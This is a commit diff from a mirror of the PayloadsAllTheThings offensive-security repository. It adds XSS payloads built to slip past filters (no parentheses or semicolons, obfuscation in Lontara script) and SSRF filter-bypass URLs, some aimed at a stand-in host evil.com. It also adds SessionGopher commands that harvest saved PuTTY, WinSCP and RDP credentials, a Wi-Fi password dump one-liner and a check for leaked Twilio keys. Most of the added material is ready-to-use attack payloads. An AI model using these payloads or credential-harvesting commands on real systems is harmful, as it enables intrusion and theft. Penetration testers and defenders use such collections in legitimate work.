mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 10:26:09 +00:00
XSS without parenthesis, semi-colon + Lontara
This commit is contained in:
parent
cc8c7b3e70
commit
9c2e63818f
@ -15,6 +15,7 @@
|
|||||||
- [BAZAAR - Source code management](#bazaar---source-code-management)
|
- [BAZAAR - Source code management](#bazaar---source-code-management)
|
||||||
- [Automatic way : rip-bzr](#automatic-way--rip-bzr)
|
- [Automatic way : rip-bzr](#automatic-way--rip-bzr)
|
||||||
- [Automatic way : bzr_dumper](#automatic-way--bzr_dumper)
|
- [Automatic way : bzr_dumper](#automatic-way--bzr_dumper)
|
||||||
|
- [Leaked API keys](#leaked-api-keys)
|
||||||
|
|
||||||
## GIT - Source code management
|
## GIT - Source code management
|
||||||
|
|
||||||
@ -236,6 +237,16 @@ $ bzr revert
|
|||||||
N static/
|
N static/
|
||||||
```
|
```
|
||||||
|
|
||||||
|
## Leaked API keys
|
||||||
|
|
||||||
|
If you find any key , use the [keyhacks](https://github.com/streaak/keyhacks) from @streaak to verifiy them.
|
||||||
|
|
||||||
|
Twilio example :
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
curl -X GET 'https://api.twilio.com/2010-04-01/Accounts/ACCOUNT_SID/Keys.json' -u ACCOUNT_SID:AUTH_TOKEN
|
||||||
|
```
|
||||||
|
|
||||||
## References
|
## References
|
||||||
|
|
||||||
- [bl4de, hidden_directories_leaks](https://github.com/bl4de/research/tree/master/hidden_directories_leaks)
|
- [bl4de, hidden_directories_leaks](https://github.com/bl4de/research/tree/master/hidden_directories_leaks)
|
||||||
|
@ -686,3 +686,4 @@ net group "Domain Admins" hacker2 /add /domain
|
|||||||
* [Abusing Exchange: One API call away from Domain Admin - Dirk-jan Mollema](https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin)
|
* [Abusing Exchange: One API call away from Domain Admin - Dirk-jan Mollema](https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin)
|
||||||
* [Red Teaming Made Easy with Exchange Privilege Escalation and PowerPriv - Thursday, January 31, 2019 - Dave](http://blog.redxorblue.com/2019/01/red-teaming-made-easy-with-exchange.html)
|
* [Red Teaming Made Easy with Exchange Privilege Escalation and PowerPriv - Thursday, January 31, 2019 - Dave](http://blog.redxorblue.com/2019/01/red-teaming-made-easy-with-exchange.html)
|
||||||
* [Chump2Trump - AD Privesc talk at WAHCKon 2017 - @l0ss](https://github.com/l0ss/Chump2Trump/blob/master/ChumpToTrump.pdf)
|
* [Chump2Trump - AD Privesc talk at WAHCKon 2017 - @l0ss](https://github.com/l0ss/Chump2Trump/blob/master/ChumpToTrump.pdf)
|
||||||
|
* [Post-OSCP Series Part 2 - Kerberoasting - 16 APRIL 2019 - Jon Hickman](https://0metasecurity.com/post-oscp-part-2/)
|
@ -320,6 +320,19 @@ Oneliner method to extract wifi passwords from all the access point.
|
|||||||
cls & echo. & for /f "tokens=4 delims=: " %a in ('netsh wlan show profiles ^| find "Profile "') do @echo off > nul & (netsh wlan show profiles name=%a key=clear | findstr "SSID Cipher Content" | find /v "Number" & echo.) & @echo on
|
cls & echo. & for /f "tokens=4 delims=: " %a in ('netsh wlan show profiles ^| find "Profile "') do @echo off > nul & (netsh wlan show profiles name=%a key=clear | findstr "SSID Cipher Content" | find /v "Number" & echo.) & @echo on
|
||||||
```
|
```
|
||||||
|
|
||||||
|
### Passwords stored in services
|
||||||
|
|
||||||
|
Saved session information for PuTTY, WinSCP, FileZilla, SuperPuTTY, and RDP using [SessionGopher](https://github.com/Arvanaghi/SessionGopher)
|
||||||
|
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
https://raw.githubusercontent.com/Arvanaghi/SessionGopher/master/SessionGopher.ps1
|
||||||
|
Import-Module path\to\SessionGopher.ps1;
|
||||||
|
Invoke-SessionGopher -AllDomain -o
|
||||||
|
Invoke-SessionGopher -AllDomain -u domain.com\adm-arvanaghi -p s3cr3tP@ss
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
## EoP - Processes Enumeration and Tasks
|
## EoP - Processes Enumeration and Tasks
|
||||||
|
|
||||||
What processes are running?
|
What processes are running?
|
||||||
|
@ -7,6 +7,19 @@
|
|||||||
* [Tools](#tools)
|
* [Tools](#tools)
|
||||||
* [Payloads with localhost](#payloads-with-localhost)
|
* [Payloads with localhost](#payloads-with-localhost)
|
||||||
* [Bypassing filters](#bypassing-filters)
|
* [Bypassing filters](#bypassing-filters)
|
||||||
|
* [Bypass using HTTPS](#bypass-using-https)
|
||||||
|
* [Bypass localhost with [::]](#bypass-localhost-with----)
|
||||||
|
* [Bypass localhost with a domain redirection](#bypass-localhost-with-a-domain-redirection)
|
||||||
|
* [Bypass localhost with CIDR](#bypass-localhost-with-cidr)
|
||||||
|
* [Bypass using a decimal IP location](#bypass-using-a-decimal-ip-location)
|
||||||
|
* [Bypass using IPv6/IPv4 Address Embedding](#bypass-using-ipv6-ipv4-address-embedding)
|
||||||
|
* [Bypass using malformed urls](#bypass-using-malformed-urls)
|
||||||
|
* [Bypass using rare address](#bypass-using-rare-address)
|
||||||
|
* [Bypass using bash variables](#bypass-using-bash-variables)
|
||||||
|
* [Bypass using tricks combination](#bypass-using-tricks-combination)
|
||||||
|
* [Bypass using enclosed alphanumerics](#bypass-using-enclosed-alphanumerics)
|
||||||
|
* [Bypass filter_var() php function](#bypass-filter-var-php-function)
|
||||||
|
* [Bypass against a weak parser](#bypass-against-a-weak-parser)
|
||||||
* [SSRF exploitation via URL Scheme](#ssrf-exploitation-via-url-scheme)
|
* [SSRF exploitation via URL Scheme](#ssrf-exploitation-via-url-scheme)
|
||||||
* [file://](#file)
|
* [file://](#file)
|
||||||
* [http://](#http)
|
* [http://](#http)
|
||||||
@ -15,7 +28,7 @@
|
|||||||
* [tftp://](#tftp)
|
* [tftp://](#tftp)
|
||||||
* [ldap://](#ldap)
|
* [ldap://](#ldap)
|
||||||
* [gopher://](#gopher)
|
* [gopher://](#gopher)
|
||||||
* [SSRF to XSS](#ssrf-to-xss-by-d0rkerdevil--alyssaoherrera)
|
* [SSRF to XSS](#ssrf-to-xss)
|
||||||
* [SSRF URL for Cloud Instances](#ssrf-url-for-cloud-instances)
|
* [SSRF URL for Cloud Instances](#ssrf-url-for-cloud-instances)
|
||||||
* [SSRF URL for AWS Bucket](#ssrf-url-for-aws-bucket)
|
* [SSRF URL for AWS Bucket](#ssrf-url-for-aws-bucket)
|
||||||
* [SSRF URL for AWS Elastic Beanstalk](#ssrf-url-for-aws-elastic-beanstalk)
|
* [SSRF URL for AWS Elastic Beanstalk](#ssrf-url-for-aws-elastic-beanstalk)
|
||||||
@ -75,14 +88,14 @@ Using this vulnerability users can upload images from any image URL = trigger an
|
|||||||
|
|
||||||
## Bypassing filters
|
## Bypassing filters
|
||||||
|
|
||||||
Bypass using HTTPS
|
### Bypass using HTTPS
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
https://127.0.0.1/
|
https://127.0.0.1/
|
||||||
https://localhost/
|
https://localhost/
|
||||||
```
|
```
|
||||||
|
|
||||||
Bypass localhost with [::]
|
### Bypass localhost with [::]
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
http://[::]:80/
|
http://[::]:80/
|
||||||
@ -98,7 +111,7 @@ http://0000::1:22/ SSH
|
|||||||
http://0000::1:3128/ Squid
|
http://0000::1:3128/ Squid
|
||||||
```
|
```
|
||||||
|
|
||||||
Bypass localhost with a domain redirecting to locahost
|
### Bypass localhost with a domain redirection
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
http://localtest.me
|
http://localtest.me
|
||||||
@ -113,16 +126,17 @@ The service nip.io is awesome for that, it will convert any ip address as a dns.
|
|||||||
NIP.IO maps <anything>.<IP Address>.nip.io to the corresponding <IP Address>, even 127.0.0.1.nip.io maps to 127.0.0.1
|
NIP.IO maps <anything>.<IP Address>.nip.io to the corresponding <IP Address>, even 127.0.0.1.nip.io maps to 127.0.0.1
|
||||||
```
|
```
|
||||||
|
|
||||||
Bypass localhost with CIDR : 127.x.x.x
|
### Bypass localhost with CIDR
|
||||||
|
|
||||||
|
It's a /8
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
it's a /8
|
|
||||||
http://127.127.127.127
|
http://127.127.127.127
|
||||||
http://127.0.1.3
|
http://127.0.1.3
|
||||||
http://127.0.0.0
|
http://127.0.0.0
|
||||||
```
|
```
|
||||||
|
|
||||||
Bypass using a decimal ip location
|
### Bypass using a decimal IP location
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
http://0177.0.0.1/
|
http://0177.0.0.1/
|
||||||
@ -131,20 +145,24 @@ http://3232235521/ = http://192.168.0.1
|
|||||||
http://3232235777/ = http://192.168.1.1
|
http://3232235777/ = http://192.168.1.1
|
||||||
```
|
```
|
||||||
|
|
||||||
Bypass using [IPv6/IPv4 Address Embedding](http://www.tcpipguide.com/free/t_IPv6IPv4AddressEmbedding.htm)
|
### Bypass using IPv6/IPv4 Address Embedding
|
||||||
|
|
||||||
|
[IPv6/IPv4 Address Embedding](http://www.tcpipguide.com/free/t_IPv6IPv4AddressEmbedding.htm)
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
http://[0:0:0:0:0:ffff:127.0.0.1]
|
http://[0:0:0:0:0:ffff:127.0.0.1]
|
||||||
```
|
```
|
||||||
|
|
||||||
Bypass using malformed urls
|
### Bypass using malformed urls
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
localhost:+11211aaa
|
localhost:+11211aaa
|
||||||
localhost:00011211aaaa
|
localhost:00011211aaaa
|
||||||
```
|
```
|
||||||
|
|
||||||
Bypass using rare address, you can short-hand IP addresses by dropping the zeros
|
### Bypass using rare address
|
||||||
|
|
||||||
|
You can short-hand IP addresses by dropping the zeros
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
http://0/
|
http://0/
|
||||||
@ -152,14 +170,16 @@ http://127.1
|
|||||||
http://127.0.1
|
http://127.0.1
|
||||||
```
|
```
|
||||||
|
|
||||||
Bypass using bash variables (curl only)
|
### Bypass using bash variables
|
||||||
|
|
||||||
|
(curl only)
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
curl -v "http://evil$google.com"
|
curl -v "http://evil$google.com"
|
||||||
$google = ""
|
$google = ""
|
||||||
```
|
```
|
||||||
|
|
||||||
Bypass using tricks combination
|
### Bypass using tricks combination
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
http://1.1.1.1 &@2.2.2.2# @3.3.3.3/
|
http://1.1.1.1 &@2.2.2.2# @3.3.3.3/
|
||||||
@ -168,7 +188,9 @@ requests + browsers : 2.2.2.2
|
|||||||
urllib : 3.3.3.3
|
urllib : 3.3.3.3
|
||||||
```
|
```
|
||||||
|
|
||||||
Bypass using enclosed alphanumerics [@EdOverflow](https://twitter.com/EdOverflow)
|
### Bypass using enclosed alphanumerics
|
||||||
|
|
||||||
|
[@EdOverflow](https://twitter.com/EdOverflow)
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
http://ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ = example.com
|
http://ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ = example.com
|
||||||
@ -177,13 +199,15 @@ List:
|
|||||||
① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳ ⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾ ⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇ ⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗ ⒘ ⒙ ⒚ ⒛ ⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰ ⒱ ⒲ ⒳ ⒴ ⒵ Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ ⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿
|
① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳ ⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾ ⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇ ⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗ ⒘ ⒙ ⒚ ⒛ ⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰ ⒱ ⒲ ⒳ ⒴ ⒵ Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ ⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿
|
||||||
```
|
```
|
||||||
|
|
||||||
Bypass filter_var() php function
|
### Bypass filter_var() php function
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
0://evil.com:80;http://google.com:80/
|
0://evil.com:80;http://google.com:80/
|
||||||
```
|
```
|
||||||
|
|
||||||
Bypass against a weak parser - by Orange Tsai ([Blackhat A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf](https://www.blackhat.com/docs/us-17/thursday/us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf))
|
### Bypass against a weak parser
|
||||||
|
|
||||||
|
by Orange Tsai ([Blackhat A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf](https://www.blackhat.com/docs/us-17/thursday/us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf))
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
http://127.1.1.1:80\@127.2.2.2:80/
|
http://127.1.1.1:80\@127.2.2.2:80/
|
||||||
@ -317,7 +341,9 @@ Content of evil.com/redirect.php:
|
|||||||
?>
|
?>
|
||||||
```
|
```
|
||||||
|
|
||||||
## SSRF to XSS by [@D0rkerDevil & @alyssa.o.herrera](https://medium.com/@D0rkerDevil/how-i-convert-ssrf-to-xss-in-a-ssrf-vulnerable-jira-e9f37ad5b158)
|
## SSRF to XSS
|
||||||
|
|
||||||
|
by [@D0rkerDevil & @alyssa.o.herrera](https://medium.com/@D0rkerDevil/how-i-convert-ssrf-to-xss-in-a-ssrf-vulnerable-jira-e9f37ad5b158)
|
||||||
|
|
||||||
```bash
|
```bash
|
||||||
http://brutelogic.com.br/poc.svg -> simple alert
|
http://brutelogic.com.br/poc.svg -> simple alert
|
||||||
|
@ -28,6 +28,7 @@ Cross-site scripting (XSS) is a type of computer security vulnerability typicall
|
|||||||
- [Bypass quotes in mousedown event](#bypass-quotes-in-mousedown-event)
|
- [Bypass quotes in mousedown event](#bypass-quotes-in-mousedown-event)
|
||||||
- [Bypass dot filter](#bypass-dot-filter)
|
- [Bypass dot filter](#bypass-dot-filter)
|
||||||
- [Bypass parenthesis for string](#bypass-parenthesis-for-string)
|
- [Bypass parenthesis for string](#bypass-parenthesis-for-string)
|
||||||
|
- [Bypass parenthesis and semi colon](#bypass-parenthesis-and-semi-colon)
|
||||||
- [Bypass onxxxx= blacklist](#bypass-onxxxx---blacklist)
|
- [Bypass onxxxx= blacklist](#bypass-onxxxx---blacklist)
|
||||||
- [Bypass space filter](#bypass-space-filter)
|
- [Bypass space filter](#bypass-space-filter)
|
||||||
- [Bypass email filter](#bypass-email-filter)
|
- [Bypass email filter](#bypass-email-filter)
|
||||||
@ -39,6 +40,7 @@ Cross-site scripting (XSS) is a type of computer security vulnerability typicall
|
|||||||
- [Bypass ";" using another character](#bypass-using------using-another-character)
|
- [Bypass ";" using another character](#bypass-using------using-another-character)
|
||||||
- [Bypass using HTML encoding](#bypass-using-html-encoding)
|
- [Bypass using HTML encoding](#bypass-using-html-encoding)
|
||||||
- [Bypass using Katana](#bypass-using-katana)
|
- [Bypass using Katana](#bypass-using-katana)
|
||||||
|
- [Bypass using Lontara](#bypass-using-lontara)
|
||||||
- [Bypass using ECMAScript6](#bypass-using-ecmascript6)
|
- [Bypass using ECMAScript6](#bypass-using-ecmascript6)
|
||||||
- [Bypass using Octal encoding](#bypass-using-octal-encoding)
|
- [Bypass using Octal encoding](#bypass-using-octal-encoding)
|
||||||
- [Bypass using Unicode](#bypass-using-unicode)
|
- [Bypass using Unicode](#bypass-using-unicode)
|
||||||
@ -525,6 +527,21 @@ alert`1`
|
|||||||
setTimeout`alert\u0028document.domain\u0029`;
|
setTimeout`alert\u0028document.domain\u0029`;
|
||||||
```
|
```
|
||||||
|
|
||||||
|
### Bypass parenthesis and semi colon
|
||||||
|
|
||||||
|
```javascript
|
||||||
|
// From @garethheyes
|
||||||
|
<script>onerror=alert;throw 1337</script>
|
||||||
|
<script>{onerror=alert}throw 1337</script>
|
||||||
|
<script>throw onerror=alert,'some string',123,'haha'</script>
|
||||||
|
|
||||||
|
// From @terjanq
|
||||||
|
<script>throw/a/,Uncaught=1,g=alert,a=URL+0,onerror=eval,/1/g+a[12]+[1337]+a[13]</script>
|
||||||
|
|
||||||
|
// From @cgvwzq
|
||||||
|
<script>TypeError.prototype.name ='=/',0[onerror=eval]['/-alert(1)//']</script>
|
||||||
|
```
|
||||||
|
|
||||||
### Bypass onxxxx= blacklist
|
### Bypass onxxxx= blacklist
|
||||||
|
|
||||||
```javascript
|
```javascript
|
||||||
@ -704,6 +721,14 @@ Using the [Katakana](https://github.com/aemkei/katakana.js) library.
|
|||||||
javascript:([,ウ,,,,ア]=[]+{},[ネ,ホ,ヌ,セ,,ミ,ハ,ヘ,,,ナ]=[!!ウ]+!ウ+ウ.ウ)[ツ=ア+ウ+ナ+ヘ+ネ+ホ+ヌ+ア+ネ+ウ+ホ][ツ](ミ+ハ+セ+ホ+ネ+'(-~ウ)')()
|
javascript:([,ウ,,,,ア]=[]+{},[ネ,ホ,ヌ,セ,,ミ,ハ,ヘ,,,ナ]=[!!ウ]+!ウ+ウ.ウ)[ツ=ア+ウ+ナ+ヘ+ネ+ホ+ヌ+ア+ネ+ウ+ホ][ツ](ミ+ハ+セ+ホ+ネ+'(-~ウ)')()
|
||||||
```
|
```
|
||||||
|
|
||||||
|
### Bypass using Lontara
|
||||||
|
|
||||||
|
```javscript
|
||||||
|
ᨆ='',ᨊ=!ᨆ+ᨆ,ᨎ=!ᨊ+ᨆ,ᨂ=ᨆ+{},ᨇ=ᨊ[ᨆ++],ᨋ=ᨊ[ᨏ=ᨆ],ᨃ=++ᨏ+ᨆ,ᨅ=ᨂ[ᨏ+ᨃ],ᨊ[ᨅ+=ᨂ[ᨆ]+(ᨊ.ᨎ+ᨂ)[ᨆ]+ᨎ[ᨃ]+ᨇ+ᨋ+ᨊ[ᨏ]+ᨅ+ᨇ+ᨂ[ᨆ]+ᨋ][ᨅ](ᨎ[ᨆ]+ᨎ[ᨏ]+ᨊ[ᨃ]+ᨋ+ᨇ+"(ᨆ)")()
|
||||||
|
```
|
||||||
|
|
||||||
|
More alphabets on http://aem1k.com/aurebesh.js/#
|
||||||
|
|
||||||
### Bypass using ECMAScript6
|
### Bypass using ECMAScript6
|
||||||
|
|
||||||
```html
|
```html
|
||||||
|
Loading…
Reference in New Issue
Block a user